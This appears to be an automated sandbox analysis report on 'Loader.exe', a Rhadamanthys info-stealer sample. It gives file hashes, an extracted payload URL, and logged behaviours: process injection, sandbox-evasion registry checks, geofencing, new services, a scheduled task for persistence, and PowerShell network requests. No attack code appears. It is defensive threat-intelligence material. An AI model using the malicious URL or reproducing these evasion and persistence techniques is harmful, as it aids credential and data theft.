Analysis
-
max time kernel
129s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
24-06-2024 09:18
Static task
static1
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Loader.exe
Resource
win10v2004-20240611-en
General
-
Target
Loader.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
5nkjivka.0do1.exedescription pid process target process PID 4844 created 2572 4844 5nkjivka.0do1.exe sihost.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepowershell.exeflow pid process 4 4756 powershell.exe 8 4756 powershell.exe 29 4532 powershell.exe 51 1084 msiexec.exe 57 4540 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 4756 powershell.exe 4532 powershell.exe 4540 powershell.exe 1096 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Loader.exe5nkjivka.0do2.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation 5nkjivka.0do2.exe -
Executes dropped EXE 3 IoCs
Processes:
5nkjivka.0do0.exe5nkjivka.0do1.exe5nkjivka.0do2.exepid process 4152 5nkjivka.0do0.exe 4844 5nkjivka.0do1.exe 2836 5nkjivka.0do2.exe -
Loads dropped DLL 6 IoCs
Processes:
MsiExec.exeMsiExec.exeMsiExec.exepid process 1532 MsiExec.exe 1532 MsiExec.exe 1532 MsiExec.exe 1532 MsiExec.exe 2976 MsiExec.exe 1864 MsiExec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 4840 powercfg.exe 2248 powercfg.exe 1020 powercfg.exe 3044 powercfg.exe -
Drops file in System32 directory 13 IoCs
Processes:
svchost.exesvchost.exesvchost.exe5nkjivka.0do0.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\RunNodeScriptAtLogon svchost.exe File opened for modification C:\Windows\system32\MRT.exe 5nkjivka.0do0.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
5nkjivka.0do0.exedescription pid process target process PID 4152 set thread context of 1920 4152 5nkjivka.0do0.exe dialer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\nodejs\node_modules\npm\lib\utils\open-url-prompt.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\run-script\lib\run-script-pkg.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cssesc\LICENSE-MIT.txt msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\packaging\_musllinux.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\config.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@tufjs\models\dist\utils\key.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\foreground-child\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmaccess\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\common\util.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\docs\examples\typescript\connectExample.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cssesc\bin\cssesc msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\indent-string\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmversion\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\input.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\lru-cache\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\readme.markdown msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\strip-ansi\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\test.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\ip-address\node_modules\sprintf-js\dist\angular-sprintf.min.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\orgs.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ci.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\validate-npm-package-name\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-find-dupes.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\patch\parse.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\bin.d.mts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\has-magic.js.map msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\registry.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\logging.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\gather-dep-set.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\retry\lib\retry_operation.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\lib\util\tmp.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\path-reservations.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@pkgjs\parseargs\examples\ordered-options.mjs msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\README.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\dist\cjs\browser.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-search.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\installed-package-contents\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\dist\mjs\signals.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\docs\examples\typescript\associateExample.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\color-convert\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-json-stream\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\lib\main.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\which\node_modules\isexe\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\timestamp\checkpoint.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\exponential-backoff\dist\delay\skip-first\skip-first.delay.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\processor.d.ts.map msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\mjs\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\unique-slug\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\arborist\reify.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\win_tool.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\core\dist\rfc3161\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\spdx-correct\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\high-level-opt.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-cache.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\identity\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\util\array.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\index.js msiexec.exe -
Drops file in Windows directory 18 IoCs
Processes:
msiexec.exesvchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSI3F1C.tmp msiexec.exe File created C:\Windows\Installer\e57d1b7.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSID497.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID4A7.tmp msiexec.exe File created C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon msiexec.exe File created C:\Windows\Installer\e57d1bb.msi msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\Installer\MSID467.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6} msiexec.exe File opened for modification C:\Windows\Installer\MSIDFD4.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57d1b7.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE795.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI419E.tmp msiexec.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4844 sc.exe 3968 sc.exe 5004 sc.exe 4084 sc.exe 1376 sc.exe 4876 sc.exe 1984 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 14 IoCs
Processes:
OfficeClickToRun.exemsiexec.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe -
Modifies registry class 33 IoCs
Processes:
msiexec.exeExplorer.EXEsihost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPath msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\4A28.tmp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\PackageCode = "AC6AA920FB9737143A7998E5BED98A71" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Version = "336330754" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\9E63273695FED9F4289603381C6A6C6D msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4A28.tmp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\npm msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductName = "Node.js" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\corepack msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\PackageName = "nodejs-installer.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\DocumentationShortcuts msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductIcon = "C:\\Windows\\Installer\\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\\NodeIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exe5nkjivka.0do1.exeopenwith.exe5nkjivka.0do0.exepowershell.exedialer.exepid process 4756 powershell.exe 4756 powershell.exe 4532 powershell.exe 4532 powershell.exe 4844 5nkjivka.0do1.exe 4844 5nkjivka.0do1.exe 3752 openwith.exe 3752 openwith.exe 3752 openwith.exe 3752 openwith.exe 4152 5nkjivka.0do0.exe 1096 powershell.exe 1096 powershell.exe 1096 powershell.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 4152 5nkjivka.0do0.exe 1920 dialer.exe 1920 dialer.exe 4152 5nkjivka.0do0.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe 1920 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exe5nkjivka.0do0.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 4756 powershell.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 4152 5nkjivka.0do0.exe Token: SeDebugPrivilege 1920 dialer.exe Token: SeShutdownPrivilege 3044 powercfg.exe Token: SeCreatePagefilePrivilege 3044 powercfg.exe Token: SeShutdownPrivilege 1020 powercfg.exe Token: SeCreatePagefilePrivilege 1020 powercfg.exe Token: SeShutdownPrivilege 4840 powercfg.exe Token: SeCreatePagefilePrivilege 4840 powercfg.exe Token: SeShutdownPrivilege 2248 powercfg.exe Token: SeCreatePagefilePrivilege 2248 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1464 svchost.exe Token: SeIncreaseQuotaPrivilege 1464 svchost.exe Token: SeSecurityPrivilege 1464 svchost.exe Token: SeTakeOwnershipPrivilege 1464 svchost.exe Token: SeLoadDriverPrivilege 1464 svchost.exe Token: SeSystemtimePrivilege 1464 svchost.exe Token: SeBackupPrivilege 1464 svchost.exe Token: SeRestorePrivilege 1464 svchost.exe Token: SeShutdownPrivilege 1464 svchost.exe Token: 